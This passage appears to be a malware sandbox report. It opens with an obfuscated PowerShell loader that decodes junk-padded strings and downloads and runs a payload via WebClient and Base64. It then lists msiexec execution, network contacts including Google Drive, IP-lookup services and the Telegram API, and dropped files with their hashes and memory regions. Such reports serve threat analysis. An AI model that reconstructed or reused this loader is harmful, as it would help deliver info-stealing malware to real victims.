(Heterolysis 'B okb$SuspegHeptaLVaporoOvercBFiskeASyrneLPejus:UncripVo dgaKomm,KB mbeNPenheiSoapwNSkrupgKernesL mpe=Buke $Bema.R,rapeaIni icBesvrKpr.isBSul,hoU vetNFr arEKugle. F,gusMa llP bollLFlykki OtheTAurig( Sire$ ForerSideleMagtffFrembeMlkenr RenseIntr nSm,teDSemidAFonolRIndisEF agmn Thins,reha)Hered ');Farveblyantens (Heterolysis $Uncleaned);$Rackbone=$Paknings[0];$Scotoscope=(Heterolysis 'unabr$Domi,gAandeLBoathoGa.opBS nsua egislUitot:Itchii NdvrS O krOKagefs B,adUSolvelCaro P IndhHA verOLed icMummeYOutmaABlrehnAfbl,iPrelucReveg=HomerNEnateeRv diwCentr- ollO St ubCaesaJNon.eEPartiC.racht vif tderSBan byBa ils V ruTPrisleMu remPharm.BeregNUneffeSigilt equi. asouwMa toeA.gifbkonduCFhovelLsideIRykkee TyrknGoneft R bb ');Farveblyantens ($Scotoscope);Farveblyantens (Heterolysis 'Skrif$inphaIS,lphsafbryoPhysosBantuuDamaslMalebp S othCornioBortlc ,tomyLath aWavennAdunciF ngecGrate.Lkke H Strae NeckaStre dOpstceRodz.r U etsokker[Musci$AktiecAbbrelSkidtaG.undmGlucupEkspe] mphi= rota$ istrSH,neya By.sgSaftnaPolypcVeno,iChilatwildwiFigare BillsExces ');$Speedingly=Heterolysis ' Eksp$anti ISubrisDetaio Unwis VedluStemnlSumakpFeelehClubboBravac oggiyS nbeaSpastnStr.liStaalcTre o. DrikDgo.opoNonmawresidnRadial Usaao,ltfaaVarerdSaturFMicr i,ickelHjnele Bet,(Sac,o$ FusiRPerigaMaturcRaahuk TropbBu.dto NostnAlluveTrecy,oprus$Pol eEA.genb Sld rRomaniBrunseKnsaktLkkesymistu)Tn ep ';$Ebriety=$aggravatingly;Farveblyantens (Heterolysis 'T lpa$ ReingOp amL Fr cO OndyBOverfADdsriLSkole: InveVEneceeOve.hLSodomtMorwka FaarLCircueFdsleNC,rdiH ogikETaba dOli os Lysv=Puckf(u odeT.etereKu.oss MommTInput-AnglopPanteAStri tUnvouh Erst Mid.$Pse,heFolkeBKr ptr Aegri edste NogetKudz,YBiz,r)Cavie ');while (!$Veltalenheds) {Farveblyantens (Heterolysis 'Taran$ ProjgWondelProleoCarpobFor uaMe itlBouil:LetofFSekunoSivmarLegi e AdgasledekkTelesrAkil iOvnemvKvikseOt.emlUdlgssSorgleElodenM,cedsCober= Porp$nea,ttKhe arArcocuFordreLi,je ') ;Farveblyantens $Speedingly;Farveblyantens (Heterolysis ' Byg SHetzeT reopADrgtir d pltsamme- eklaSB,ritlEuryleViza EPapulPPanni Oplsn4 Alst ');Farveblyantens (Heterolysis ' Ko.o$Gavn gMaskiLC iroOMessibBegmaa Aks l Sta,: Mye,VPrea EBrnell BirctResodaMin,rlAsym.E LandnS.hizHPetr,eNoggiDirkapSSix.y=alcoh(AllesT HoveEDubbes.mnorTnonel-Al haPGyne aP ppyt ntenhProdu Inte.$JaminE rggB replRFyr tiForeceHusteT,pspay Stee)A ten ') ;Farveblyantens (Heterolysis 'Clube$DiskogArbejlOverdodramabGodseATe rilfl gt: ollskUnp,rEAb.epr Hy.rnSrbehe F.grrGena e UopsAKommukmodspTGa,eporenteRHvid EHairgRsjlesSInter= Verd$Mi,coGfl.orlSynoroAnti bKvindAMu aglSecun: .utldTaksiEBi,ulR Pl dAToupyY.ndtrsThyme+ Stor+Sper % Tmme$ CellpDel,ga S ulkTh rmN upariSidebn,veriGPleatSUnpos.prececForbeoF uefUResalnAltertturba ') ;$Rackbone=$Paknings[$Kernereaktorers];}$Monkess=299952;$Troperegnens=31724;Farveblyantens (Heterolysis 'B for$bardiG U.gdl ydeloHumo b rugtaPerinLKedel:RokkeksauldiOut,iNFljalA Kl seUnsupS yd yTMetamhMotorEAssonTAs.roiMaskiCStussaEkspoL tounlUng.ay Coss Kant = Iltr TableGNondiE A beTMaihe-Picolc prosoRondoNPr ciTha raE ,aluNRakesTHy.og P ead$ TredeForreb ociarFinhviLis.eE Kry tPaideyKolon ');Farveblyantens (Heterolysis 'Rumle$ForndgTnksol lerco idenbCephaatranslRaket:N nreO reaciStraplHandiiArvensJawf.hinco Rares= Vete Asfal[Ula.rSSpeciyArveasB,nomtdelpreVej em Gowd. erapCPal,eoPlentnOpslavElusieKrea.rQuadrtMe be] Prio:Thirs:ElskeFEffekrHderso.atstmChronB GrovaTinstsBeepeeIsoci6Glend4HyperSShammt Thi rSmr.ei Pr anRealkgAgree(fa.ds$Rnke K chasiCataln HydraPanele HomosExci,t Lavvh AmoreA seltHeavyiUtaalcJub.laSelvilGarotl irexy Tidd)major ');Farveblyantens (Heterolysis 'Depil$PaleoGTabb LFuroroUnchrBDolinaForstLSu fo: I,dhFAmireaTroldl B mbdPatrilplynde F,rsmCinem Rel e= Undi Glass[GenneS ountyAnno,SCutofTAd.neEPaireM P an.TilsiTQu.nae,ntisxNonubt Prin. iltee As.onSkilbcFlygeO BoblDUgle I CrasnFratrG Exce]Bevis:Kreml: ileAMe orsAl orcBu,triI geni s.ok.OpbraGO,erhEA,delTAf egSBr nzTLiebeR oldnivvninNVokalGAnst.(Per b$ krabOKo.leiLserslPremoICambiSTestpH Dees)Ep.xy ');Farveblyantens (Heterolysis 'Theti$ Befag Car.L U,clocorinBHemibAP eefl emat: OversJagthaSauntMSylleuSndagERetmslBarges Dokt=Tha.a$ evefM,mboAFinkmLSubtlD Sal.lScutte TortMBio e.Acyros idsruforsrb ,ayoSMittetEvittRtekn iRecalN PatogPyrrh(Jubil$ UforM ysseoHa shNAlmenKSkandeDobosSTraucSSteam, apno$subb tBaronRcowieOFrakepDecimEEpiphRTreadEEftergdelggNEks le.vertn DyrksSuber) Hors ');Farveblyantens $Samuels;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 193.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.180.3:80 o.pki.goog tcp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
DE 193.122.6.168:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 152.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 168.6.122.193.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

memory/4652-0-0x00007FF9E77E3000-0x00007FF9E77E5000-memory.dmp

memory/4652-1-0x0000029757CB0000-0x0000029757CD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gpvych5n.1ms.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4652-11-0x00007FF9E77E0000-0x00007FF9E82A1000-memory.dmp

memory/4652-12-0x00007FF9E77E0000-0x00007FF9E82A1000-memory.dmp

memory/4652-15-0x00007FF9E77E3000-0x00007FF9E77E5000-memory.dmp

memory/4652-16-0x00007FF9E77E0000-0x00007FF9E82A1000-memory.dmp

memory/4652-17-0x00007FF9E77E0000-0x00007FF9E82A1000-memory.dmp

memory/4652-20-0x00007FF9E77E0000-0x00007FF9E82A1000-memory.dmp

memory/1640-21-0x0000000002420000-0x0000000002456000-memory.dmp

memory/1640-22-0x0000000004FB0000-0x00000000055D8000-memory.dmp

memory/1640-23-0x0000000004D70000-0x0000000004D92000-memory.dmp

memory/1640-24-0x0000000004F10000-0x0000000004F76000-memory.dmp

memory/1640-25-0x0000000005710000-0x0000000005776000-memory.dmp

memory/1640-35-0x0000000005780000-0x0000000005AD4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 71444def27770d9071039d005d0323b7
SHA1 cef8654e95495786ac9347494f4417819373427e
SHA256 8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512 a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

memory/1640-37-0x0000000005D30000-0x0000000005D4E000-memory.dmp

memory/1640-38-0x0000000005D70000-0x0000000005DBC000-memory.dmp

memory/1640-39-0x00000000076C0000-0x0000000007D3A000-memory.dmp

memory/1640-40-0x00000000062C0000-0x00000000062DA000-memory.dmp

memory/1640-41-0x0000000007040000-0x00000000070D6000-memory.dmp

memory/1640-42-0x0000000006F40000-0x0000000006F62000-memory.dmp

memory/1640-43-0x0000000007D40000-0x00000000082E4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Databaands.Cag

MD5 f6579ea1ab825b27780f29716bf33381
SHA1 2f4b5633c9540b3010c53fc058efc3d6d77642f3
SHA256 88ae5c99126911132ed637b343c055ff1be103986116f998ef7247a573e2d823
SHA512 2977eacd74cfb217d8ec3ea87441a8211b7ffa2103e083b3e690fc9604615929159aad52fd2f2c35b53a3656298c8b2c0c08e51d5953f9c8f2ebc472b30a4e67

memory/1640-45-0x00000000082F0000-0x000000000C77A000-memory.dmp

memory/4456-59-0x0000000000C00000-0x0000000001E54000-memory.dmp

memory/4456-60-0x0000000000C00000-0x0000000001E54000-memory.dmp

memory/4456-61-0x0000000000C00000-0x0000000000C48000-memory.dmp

memory/4456-62-0x0000000024240000-0x00000000242DC000-memory.dmp

memory/4456-64-0x0000000024EA0000-0x0000000025062000-memory.dmp

memory/4456-65-0x00000000246F0000-0x0000000024740000-memory.dmp

memory/4456-66-0x0000000024820000-0x00000000248B2000-memory.dmp

memory/4456-67-0x00000000247D0000-0x00000000247DA000-memory.dmp